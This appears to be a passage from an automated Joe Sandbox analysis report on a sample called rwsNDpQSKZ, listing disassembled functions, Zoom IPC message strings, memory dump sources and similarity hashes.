                  • Part of subcall function 00C93584: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,0000004C,00C73B97,com.zoom.app.cci.ccivideo.on.closed.caption.changed.notify,fontSize,jsonColor,com.zoom.app.cci.ccivideo.on.closed.caption.changed.notify,00009EB8,fontSize,jsonColor,00000004), ref: 00C935DF
                  • Part of subcall function 00C93584: ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(?,-00000004,?,0000004C,00C73B97,com.zoom.app.cci.ccivideo.on.closed.caption.changed.notify,fontSize,jsonColor,com.zoom.app.cci.ccivideo.on.closed.caption.changed.notify,00009EB8,fontSize,jsonColor,00000004), ref: 00C9361C
                  • Part of subcall function 00C93584: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,?,-00000004,?,0000004C,00C73B97,com.zoom.app.cci.ccivideo.on.closed.caption.changed.notify,fontSize,jsonColor,com.zoom.app.cci.ccivideo.on.closed.caption.changed.notify,00009EB8,fontSize,jsonColor,00000004), ref: 00C9364C
                  • Part of subcall function 00C93584: EnterCriticalSection.KERNEL32(?,?,?,?,?,-00000004,?,?,-00000004,?,0000004C,00C73B97,com.zoom.app.cci.ccivideo.on.closed.caption.changed.notify,fontSize,jsonColor,com.zoom.app.cci.ccivideo.on.closed.caption.changed.notify), ref: 00C936AA
                  • Part of subcall function 00C93584: LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,-00000004,?,?,-00000004,?,0000004C,00C73B97,com.zoom.app.cci.ccivideo.on.closed.caption.changed.notify,fontSize,jsonColor), ref: 00C936C7
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Cmm@@$??0?$Archive@$ArchiveString$CriticalH_prolog3MessagePackageSectionTree@$Cmm@@@EnterH00@H_prolog3_LeaveNode@23@Root@Template_1@Template_2@Tree
                • String ID: com.zoom.app.assistant.voice.command.action.request$command$param
                • API String ID: 2715420528-3993837324
                • Opcode ID: 27353726fbbce1ec0f922d845e3a382c54897dc44973ee9073586f180724d7ae
                • Instruction ID: 0d2793ebbf45825f497b75cebe09600685c04c768676d59b2a047cb2ddf4ebb1
                • Opcode Fuzzy Hash: 27353726fbbce1ec0f922d845e3a382c54897dc44973ee9073586f180724d7ae
                • Instruction Fuzzy Hash: BBE092F8644794ABD720AB418C06B6F72A8EB40B19F04456DF1045F3D2CBF40D44C77A
                Function 00C746C0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 25windowCOMMON
                Download Yara Rule
                APIs
                • __EH_prolog3.LIBCMT ref: 00C746C7
                • ??0?$CmmMessageTemplate_2@V?$CStringT@_W@Cmm@@H@Archive@Cmm@@QAE@PBDH00@Z.RWSNDPQSKZ(com.Zoom.app.conf.tracking.paap.event,00002792,composedEventInfo,type,00000004), ref: 00C746E7
                  • Part of subcall function 00C8B360: __EH_prolog3.LIBCMT ref: 00C8B367
                  • Part of subcall function 00C8B360: ??0?$CmmMessageTemplate_1@V?$CStringT@_W@Cmm@@@Archive@Cmm@@QAE@PBDH0@Z.RWSNDPQSKZ(?,?,?,00000004,00C6BA5C,com.zoom.app.notify.recaptcha.confirm,00002762,user_input,cancel,00000004), ref: 00C8B37A
                  • Part of subcall function 00C8B40D: __EH_prolog3_GS.LIBCMT ref: 00C8B414
                  • Part of subcall function 00C8B40D: ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(0000004C,00C6BA87,com.zoom.app.notify.recaptcha.confirm,user_input,cancel,com.zoom.app.notify.recaptcha.confirm,00002762,user_input,cancel,00000004), ref: 00C8B43A
                  • Part of subcall function 00C8B40D: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,0000004C,00C6BA87,com.zoom.app.notify.recaptcha.confirm,user_input,cancel,com.zoom.app.notify.recaptcha.confirm,00002762,user_input,cancel,00000004), ref: 00C8B468
                  • Part of subcall function 00C8B40D: ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(?,-00000004,?,0000004C,00C6BA87,com.zoom.app.notify.recaptcha.confirm,user_input,cancel,com.zoom.app.notify.recaptcha.confirm,00002762,user_input,cancel,00000004), ref: 00C8B4A5
                  • Part of subcall function 00C8B40D: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,?,-00000004,?,0000004C,00C6BA87,com.zoom.app.notify.recaptcha.confirm,user_input,cancel,com.zoom.app.notify.recaptcha.confirm,00002762,user_input,cancel,00000004), ref: 00C8B4D5
                  • Part of subcall function 00C8B40D: EnterCriticalSection.KERNEL32(?,?,?,?,?,-00000004,?,?,-00000004,?,0000004C,00C6BA87,com.zoom.app.notify.recaptcha.confirm,user_input,cancel,com.zoom.app.notify.recaptcha.confirm), ref: 00C8B533
                  • Part of subcall function 00C8B40D: LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,-00000004,?,?,-00000004,?,0000004C,00C6BA87,com.zoom.app.notify.recaptcha.confirm,user_input,cancel), ref: 00C8B550
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Cmm@@$??0?$Archive@String$Archive$CriticalH_prolog3MessagePackageSectionTree@$Cmm@@@EnterH00@H_prolog3_LeaveNode@23@Root@Template_1@Template_2@Tree
                • String ID: com.Zoom.app.conf.tracking.paap.event$composedEventInfo$type
                • API String ID: 2703795933-660578694
                • Opcode ID: 2aa9f4b4694e72dd11e6d3af76702ba557cccc0817784a4963cce5fd22cecdea
                • Instruction ID: 43aecf356e33b2819e66a1fae27385ef9cc99aa6f419a516ac92dc852b8a4bc1
                • Opcode Fuzzy Hash: 2aa9f4b4694e72dd11e6d3af76702ba557cccc0817784a4963cce5fd22cecdea
                • Instruction Fuzzy Hash: E1E092F16543A8ABE7147B549C86B2AA2A4EB91B19F60443CF3049E392CBF40D48D775
                Function 00C707E0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 25windowCOMMON
                Download Yara Rule
                APIs
                • __EH_prolog3.LIBCMT ref: 00C707E7
                • ??0?$CmmMessageTemplate_2@II@Archive@Cmm@@QAE@PBDH00@Z.RWSNDPQSKZ(com.zoom.app.log.startchannel,00009D9F,ChannelId,GroupId,00000004), ref: 00C70807
                  • Part of subcall function 00C85120: __EH_prolog3.LIBCMT ref: 00C85127
                  • Part of subcall function 00C85120: ??0?$CmmMessageTemplate_1@I@Archive@Cmm@@QAE@PBDH0@Z.RWSNDPQSKZ(?,?,?,00000004,00C67BBC,com.Zoom.app.mainboard.networkState,00004E29,State,Flag,00000004), ref: 00C8513A
                  • Part of subcall function 00C851CD: __EH_prolog3_GS.LIBCMT ref: 00C851D4
                  • Part of subcall function 00C851CD: ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(0000004C,00C67BE7,com.Zoom.app.mainboard.networkState,State,Flag,com.Zoom.app.mainboard.networkState,00004E29,State,Flag,00000004), ref: 00C851FA
                  • Part of subcall function 00C851CD: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,0000004C,00C67BE7,com.Zoom.app.mainboard.networkState,State,Flag,com.Zoom.app.mainboard.networkState,00004E29,State,Flag,00000004), ref: 00C85228
                  • Part of subcall function 00C851CD: ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(?,-00000004,?,0000004C,00C67BE7,com.Zoom.app.mainboard.networkState,State,Flag,com.Zoom.app.mainboard.networkState,00004E29,State,Flag,00000004), ref: 00C85265
                  • Part of subcall function 00C851CD: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,?,-00000004,?,0000004C,00C67BE7,com.Zoom.app.mainboard.networkState,State,Flag,com.Zoom.app.mainboard.networkState,00004E29,State,Flag,00000004), ref: 00C85295
                  • Part of subcall function 00C851CD: EnterCriticalSection.KERNEL32(?,?,?,?,?,-00000004,?,?,-00000004,?,0000004C,00C67BE7,com.Zoom.app.mainboard.networkState,State,Flag,com.Zoom.app.mainboard.networkState), ref: 00C852F3
                  • Part of subcall function 00C851CD: LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,-00000004,?,?,-00000004,?,0000004C,00C67BE7,com.Zoom.app.mainboard.networkState,State,Flag), ref: 00C85310
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Cmm@@$??0?$Archive@$Archive$CriticalH_prolog3MessagePackageSectionStringTree@$EnterH00@H_prolog3_LeaveNode@23@Root@Template_1@Template_2@Tree
                • String ID: ChannelId$GroupId$com.zoom.app.log.startchannel
                • API String ID: 3124793654-2005458431
                • Opcode ID: 7935fda2046b3f76a6afbd6c707b3351c119b0acacdb138e2f5fa105e073a31e
                • Instruction ID: b20dc5c983fd9f0899d5dac7a1eaaa783d9fa1ebec005dab69e454174a7cc8a4
                • Opcode Fuzzy Hash: 7935fda2046b3f76a6afbd6c707b3351c119b0acacdb138e2f5fa105e073a31e
                • Instruction Fuzzy Hash: 87E092B0640385EBDB20BB449C0AB6EA2A4EB80B19F50452CB2009B3C1CBF14C00CBB5
                Function 00C70780 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 25windowCOMMON
                Download Yara Rule
                APIs
                • __EH_prolog3.LIBCMT ref: 00C70787
                • ??0?$CmmMessageTemplate_2@IV?$CStringT@D@Cmm@@@Archive@Cmm@@QAE@PBDH00@Z.RWSNDPQSKZ(com.zoom.app.assistant.sip.check.nomadic.911.notification,00009D19,CheckResult,LocalIP,00000004), ref: 00C707A7
                  • Part of subcall function 00C85B10: __EH_prolog3.LIBCMT ref: 00C85B17
                  • Part of subcall function 00C85B10: ??0?$CmmMessageTemplate_1@I@Archive@Cmm@@QAE@PBDH0@Z.RWSNDPQSKZ(?,?,?,00000004,00C85A32,?,?,?,?,00000004,00C6833F,com.Zoom.app.conf.start,00002718,ProcessID,ProcessName,RecoveryCommand), ref: 00C85B2A
                  • Part of subcall function 00C5D6ED: __EH_prolog3_GS.LIBCMT ref: 00C5D6F4
                  • Part of subcall function 00C5D6ED: ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(0000004C,00C5C7F7,com.zoom.app.mapi.outlookmapi.eventchange.notify,NotifyType,EventID,com.zoom.app.mapi.outlookmapi.eventchange.notify,00009E66,NotifyType,EventID,00000004), ref: 00C5D71A
                  • Part of subcall function 00C5D6ED: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,0000004C,00C5C7F7,com.zoom.app.mapi.outlookmapi.eventchange.notify,NotifyType,EventID,com.zoom.app.mapi.outlookmapi.eventchange.notify,00009E66,NotifyType,EventID,00000004), ref: 00C5D748
                  • Part of subcall function 00C5D6ED: ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(?,-00000004,?,0000004C,00C5C7F7,com.zoom.app.mapi.outlookmapi.eventchange.notify,NotifyType,EventID,com.zoom.app.mapi.outlookmapi.eventchange.notify,00009E66,NotifyType,EventID,00000004), ref: 00C5D785
                  • Part of subcall function 00C5D6ED: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,?,-00000004,?,0000004C,00C5C7F7,com.zoom.app.mapi.outlookmapi.eventchange.notify,NotifyType,EventID,com.zoom.app.mapi.outlookmapi.eventchange.notify,00009E66,NotifyType,EventID,00000004), ref: 00C5D7B5
                  • Part of subcall function 00C5D6ED: EnterCriticalSection.KERNEL32(?,?,?,?,?,-00000004,?,?,-00000004,?,0000004C,00C5C7F7,com.zoom.app.mapi.outlookmapi.eventchange.notify,NotifyType,EventID,com.zoom.app.mapi.outlookmapi.eventchange.notify), ref: 00C5D813
                  • Part of subcall function 00C5D6ED: LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,-00000004,?,?,-00000004,?,0000004C,00C5C7F7,com.zoom.app.mapi.outlookmapi.eventchange.notify,NotifyType,EventID), ref: 00C5D830
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Cmm@@$??0?$Archive@$ArchiveString$CriticalH_prolog3MessagePackageSectionTree@$Cmm@@@EnterH00@H_prolog3_LeaveNode@23@Root@Template_1@Template_2@Tree
                • String ID: CheckResult$LocalIP$com.zoom.app.assistant.sip.check.nomadic.911.notification
                • API String ID: 2715420528-2172794164
                • Opcode ID: b268ac1bb446bff55e5a10603af7ccdee496316613c993dc13625f91a53d60ee
                • Instruction ID: 49dc649196755fb62adcb94aee56ef9c81f34d0f16ccbe711d1bc0a7db0136f0
                • Opcode Fuzzy Hash: b268ac1bb446bff55e5a10603af7ccdee496316613c993dc13625f91a53d60ee
                • Instruction Fuzzy Hash: D0E092B8A80346BBE7106B454C56B2B62A4EB90B1AF60457DB2109A3D1CAF04D44DBB4
                Function 00C5C7A0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 25windowCOMMON
                Download Yara Rule
                APIs
                • __EH_prolog3.LIBCMT ref: 00C5C7A7
                • ??0?$CmmMessageTemplate_2@IV?$CStringT@_W@Cmm@@@Archive@Cmm@@QAE@PBDH00@Z.RWSNDPQSKZ(com.zoom.app.mapi.outlookmapi.eventchange.notify,00009E66,NotifyType,EventID,00000004), ref: 00C5C7C7
                  • Part of subcall function 00C5D600: __EH_prolog3.LIBCMT ref: 00C5D607
                  • Part of subcall function 00C5D600: ??0?$CmmMessageTemplate_1@I@Archive@Cmm@@QAE@PBDH0@Z.RWSNDPQSKZ(?,?,?,00000004,00C5C7CC,com.zoom.app.mapi.outlookmapi.eventchange.notify,00009E66,NotifyType,EventID,00000004), ref: 00C5D61A
                  • Part of subcall function 00C5D6ED: __EH_prolog3_GS.LIBCMT ref: 00C5D6F4
                  • Part of subcall function 00C5D6ED: ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(0000004C,00C5C7F7,com.zoom.app.mapi.outlookmapi.eventchange.notify,NotifyType,EventID,com.zoom.app.mapi.outlookmapi.eventchange.notify,00009E66,NotifyType,EventID,00000004), ref: 00C5D71A
                  • Part of subcall function 00C5D6ED: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,0000004C,00C5C7F7,com.zoom.app.mapi.outlookmapi.eventchange.notify,NotifyType,EventID,com.zoom.app.mapi.outlookmapi.eventchange.notify,00009E66,NotifyType,EventID,00000004), ref: 00C5D748
                  • Part of subcall function 00C5D6ED: ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(?,-00000004,?,0000004C,00C5C7F7,com.zoom.app.mapi.outlookmapi.eventchange.notify,NotifyType,EventID,com.zoom.app.mapi.outlookmapi.eventchange.notify,00009E66,NotifyType,EventID,00000004), ref: 00C5D785
                  • Part of subcall function 00C5D6ED: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,?,-00000004,?,0000004C,00C5C7F7,com.zoom.app.mapi.outlookmapi.eventchange.notify,NotifyType,EventID,com.zoom.app.mapi.outlookmapi.eventchange.notify,00009E66,NotifyType,EventID,00000004), ref: 00C5D7B5
                  • Part of subcall function 00C5D6ED: EnterCriticalSection.KERNEL32(?,?,?,?,?,-00000004,?,?,-00000004,?,0000004C,00C5C7F7,com.zoom.app.mapi.outlookmapi.eventchange.notify,NotifyType,EventID,com.zoom.app.mapi.outlookmapi.eventchange.notify), ref: 00C5D813
                  • Part of subcall function 00C5D6ED: LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,-00000004,?,?,-00000004,?,0000004C,00C5C7F7,com.zoom.app.mapi.outlookmapi.eventchange.notify,NotifyType,EventID), ref: 00C5D830
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Cmm@@$??0?$Archive@$ArchiveString$CriticalH_prolog3MessagePackageSectionTree@$Cmm@@@EnterH00@H_prolog3_LeaveNode@23@Root@Template_1@Template_2@Tree
                • String ID: EventID$NotifyType$com.zoom.app.mapi.outlookmapi.eventchange.notify
                • API String ID: 2715420528-993383234
                • Opcode ID: 9633472847a7a22737a0d0a7c8f01441cb78c5781ecab7a491188f1272cbbf8d
                • Instruction ID: aebafe0d6fd4e7555d1489a7ee922c22d92703995d3ce5beb42ff19aa17b42dd
                • Opcode Fuzzy Hash: 9633472847a7a22737a0d0a7c8f01441cb78c5781ecab7a491188f1272cbbf8d
                • Instruction Fuzzy Hash: 22E09BB0E407556FD7257B815C45F2AB5B4D794B55F110518B1205B3C2CBF80DC4CB74
                Function 00C768E0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 25windowCOMMON
                Download Yara Rule
                APIs
                • __EH_prolog3.LIBCMT ref: 00C768E7
                • ??0?$CmmMessageTemplate_2@IV?$CStringT@_W@Cmm@@@Archive@Cmm@@QAE@PBDH00@Z.RWSNDPQSKZ(com.zoom.ps.return.asyncrecording.action.token,00013898,action_type,web_record_info,00000004), ref: 00C76907
                  • Part of subcall function 00C5D600: __EH_prolog3.LIBCMT ref: 00C5D607
                  • Part of subcall function 00C5D600: ??0?$CmmMessageTemplate_1@I@Archive@Cmm@@QAE@PBDH0@Z.RWSNDPQSKZ(?,?,?,00000004,00C5C7CC,com.zoom.app.mapi.outlookmapi.eventchange.notify,00009E66,NotifyType,EventID,00000004), ref: 00C5D61A
                  • Part of subcall function 00C5D6ED: __EH_prolog3_GS.LIBCMT ref: 00C5D6F4
                  • Part of subcall function 00C5D6ED: ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(0000004C,00C5C7F7,com.zoom.app.mapi.outlookmapi.eventchange.notify,NotifyType,EventID,com.zoom.app.mapi.outlookmapi.eventchange.notify,00009E66,NotifyType,EventID,00000004), ref: 00C5D71A
                  • Part of subcall function 00C5D6ED: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,0000004C,00C5C7F7,com.zoom.app.mapi.outlookmapi.eventchange.notify,NotifyType,EventID,com.zoom.app.mapi.outlookmapi.eventchange.notify,00009E66,NotifyType,EventID,00000004), ref: 00C5D748
                  • Part of subcall function 00C5D6ED: ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(?,-00000004,?,0000004C,00C5C7F7,com.zoom.app.mapi.outlookmapi.eventchange.notify,NotifyType,EventID,com.zoom.app.mapi.outlookmapi.eventchange.notify,00009E66,NotifyType,EventID,00000004), ref: 00C5D785
                  • Part of subcall function 00C5D6ED: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,?,-00000004,?,0000004C,00C5C7F7,com.zoom.app.mapi.outlookmapi.eventchange.notify,NotifyType,EventID,com.zoom.app.mapi.outlookmapi.eventchange.notify,00009E66,NotifyType,EventID,00000004), ref: 00C5D7B5
                  • Part of subcall function 00C5D6ED: EnterCriticalSection.KERNEL32(?,?,?,?,?,-00000004,?,?,-00000004,?,0000004C,00C5C7F7,com.zoom.app.mapi.outlookmapi.eventchange.notify,NotifyType,EventID,com.zoom.app.mapi.outlookmapi.eventchange.notify), ref: 00C5D813
                  • Part of subcall function 00C5D6ED: LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,-00000004,?,?,-00000004,?,0000004C,00C5C7F7,com.zoom.app.mapi.outlookmapi.eventchange.notify,NotifyType,EventID), ref: 00C5D830
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Cmm@@$??0?$Archive@$ArchiveString$CriticalH_prolog3MessagePackageSectionTree@$Cmm@@@EnterH00@H_prolog3_LeaveNode@23@Root@Template_1@Template_2@Tree
                • String ID: action_type$com.zoom.ps.return.asyncrecording.action.token$web_record_info
                • API String ID: 2715420528-446266280
                • Opcode ID: 0ba892d3b0de0d6760cdd71f4dc54b4952c3cee2a9100469100a8d4d51a855f3
                • Instruction ID: e3af122687177111095dd0385c214b57ce60214261ab8e41f87bb82997b97c4b
                • Opcode Fuzzy Hash: 0ba892d3b0de0d6760cdd71f4dc54b4952c3cee2a9100469100a8d4d51a855f3
                • Instruction Fuzzy Hash: A6E022F0644786AFC3246B004C05B2AB1A8DB40B1AF008428B1145F391CEF00D84D735
                Function 00C6C8F0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 25windowCOMMON
                Download Yara Rule
                APIs
                • __EH_prolog3.LIBCMT ref: 00C6C8F7
                • ??0?$CmmMessageTemplate_2@IV?$CStringT@D@Cmm@@@Archive@Cmm@@QAE@PBDH00@Z.RWSNDPQSKZ(com.zoom.app.assistant_app_start,00009C41,ProcessID,ProcessName,00000004), ref: 00C6C917
                  • Part of subcall function 00C85B10: __EH_prolog3.LIBCMT ref: 00C85B17
                  • Part of subcall function 00C85B10: ??0?$CmmMessageTemplate_1@I@Archive@Cmm@@QAE@PBDH0@Z.RWSNDPQSKZ(?,?,?,00000004,00C85A32,?,?,?,?,00000004,00C6833F,com.Zoom.app.conf.start,00002718,ProcessID,ProcessName,RecoveryCommand), ref: 00C85B2A
                  • Part of subcall function 00C5D6ED: __EH_prolog3_GS.LIBCMT ref: 00C5D6F4
                  • Part of subcall function 00C5D6ED: ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(0000004C,00C5C7F7,com.zoom.app.mapi.outlookmapi.eventchange.notify,NotifyType,EventID,com.zoom.app.mapi.outlookmapi.eventchange.notify,00009E66,NotifyType,EventID,00000004), ref: 00C5D71A
                  • Part of subcall function 00C5D6ED: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,0000004C,00C5C7F7,com.zoom.app.mapi.outlookmapi.eventchange.notify,NotifyType,EventID,com.zoom.app.mapi.outlookmapi.eventchange.notify,00009E66,NotifyType,EventID,00000004), ref: 00C5D748
                  • Part of subcall function 00C5D6ED: ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(?,-00000004,?,0000004C,00C5C7F7,com.zoom.app.mapi.outlookmapi.eventchange.notify,NotifyType,EventID,com.zoom.app.mapi.outlookmapi.eventchange.notify,00009E66,NotifyType,EventID,00000004), ref: 00C5D785
                  • Part of subcall function 00C5D6ED: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,?,-00000004,?,0000004C,00C5C7F7,com.zoom.app.mapi.outlookmapi.eventchange.notify,NotifyType,EventID,com.zoom.app.mapi.outlookmapi.eventchange.notify,00009E66,NotifyType,EventID,00000004), ref: 00C5D7B5
                  • Part of subcall function 00C5D6ED: EnterCriticalSection.KERNEL32(?,?,?,?,?,-00000004,?,?,-00000004,?,0000004C,00C5C7F7,com.zoom.app.mapi.outlookmapi.eventchange.notify,NotifyType,EventID,com.zoom.app.mapi.outlookmapi.eventchange.notify), ref: 00C5D813
